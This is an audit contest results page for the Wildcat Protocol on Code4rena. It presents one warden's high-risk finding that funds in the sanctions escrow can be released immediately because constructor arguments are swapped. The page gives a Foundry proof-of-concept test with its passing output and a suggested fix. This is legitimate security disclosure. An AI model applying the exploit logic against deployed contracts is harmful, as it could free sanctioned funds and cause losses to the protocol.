Back to 0xSwahili's contests

The Wildcat Protocol - 0xSwahili's results

Banking, but worse - a protocol for fixed-rate, undercollateralised credit facilities.

General Information

Platform: Code4rena

Start Date: 16/10/2023

Pot Size: $60,500 USDC

Total HM: 16

Participants: 131

Period: 10 days

Judge: 0xTheC0der

Total Solo HM: 3

Id: 296

League: ETH

Wildcat Protocol

Findings Distribution

Researcher Performance

Rank: 105/131

Findings: 1

Award: $6.67

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryWildcat Protocol

Findings Information

🌟 Selected for report: YusSecurity

Also found by: 0xAsen, 0xCiphky, 0xDING99YA, 0xKbl, 0xSwahili, 0xbepresent, 3docSec, AS, Aymen0909, DeFiHackLabs, GREY-HAWK-REACH, KeyKiril, MiloTruck, QiuhaoLi, Silvermist, SovaSlava, TrungOre, VAD37, Vagner, Yanchuan, ZdravkoHr, ast3ros, cartlex_, d3e4, deth, ggg_ttt_hhh, gizzy, kodyvim, nirlin, nobody2018, rvierdiiev, serial-coder, sl1, tallo, xeros

Awards

6.6715 USDC - $6.67

Labels

bug
3 (High Risk)
satisfactory
upgraded by judge
edited-by-warden
duplicate-68

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2023-10-wildcat/blob/c5df665f0bc2ca5df6f06938d66494b11e7bdada/src/market/WildcatMarketWithdrawals.sol#L166

Vulnerability details

Impact

Funds escrowed in the WildcatSanctionsEscrow via WildcatMarketWithdrawals and src/market/WildcatMarketBase.sol::_blockAccount can be immediately moved out, against the protocol design of keeping them safe until the account is cleared by authorities.

Proof of Concept

Add this test code into WildcatMarketWithdrawals.t.sol

function test_can_withdraw_sanctioned_executeWithdrawal_Sanctioned() external {
    _deposit(alice, 1e18);
    _requestWithdrawal(alice, 1e18);
    fastForward(parameters.withdrawalBatchDuration);
    sanctionsSentinel.sanction(alice);
    address escrow = sanctionsSentinel.getEscrowAddress(alice, borrower, address(asset));
    vm.expectEmit(address(asset));
    emit Transfer(address(market), escrow, 1e18);
    vm.expectEmit(address(market));
    emit SanctionedAccountWithdrawalSentToEscrow(alice, escrow, uint32(block.timestamp), 1e18);
    market.executeWithdrawal(alice, uint32(block.timestamp));
    WildcatSanctionsEscrow(escrow).releaseEscrow();
    WildcatSanctionsEscrow(escrow).balance();
  }

Then run it as:

forge test --match-path test/market/WildcatMarketWithdrawals.t.sol --match-contract WithdrawalsTest --match-test "test_can_withdraw_sanctioned_executeWithdrawal_Sanctioned"

Test results:

Running 1 test for test/market/WildcatMarketWithdrawals.t.sol:WithdrawalsTest
[PASS] test_can_withdraw_sanctioned_executeWithdrawal_Sanctioned() (gas: 929168)
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.93ms

Tools Used

Manual review

Switch the account and depositor parameters at WildcatSanctionsEscrow to be

address escrow = IWildcatSanctionsSentinel(sentinel).createEscrow(
        borrower,
        accountAddress,
        address(asset)
      );

Assessed type

Invalid Validation

#0 - c4-pre-sort

2023-10-28T10:07:54Z

minhquanym marked the issue as duplicate of #515

#1 - c4-judge

2023-11-07T11:46:36Z

MarioPoneder changed the severity to 3 (High Risk)

#2 - c4-judge

2023-11-07T12:11:47Z

MarioPoneder marked the issue as satisfactory

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter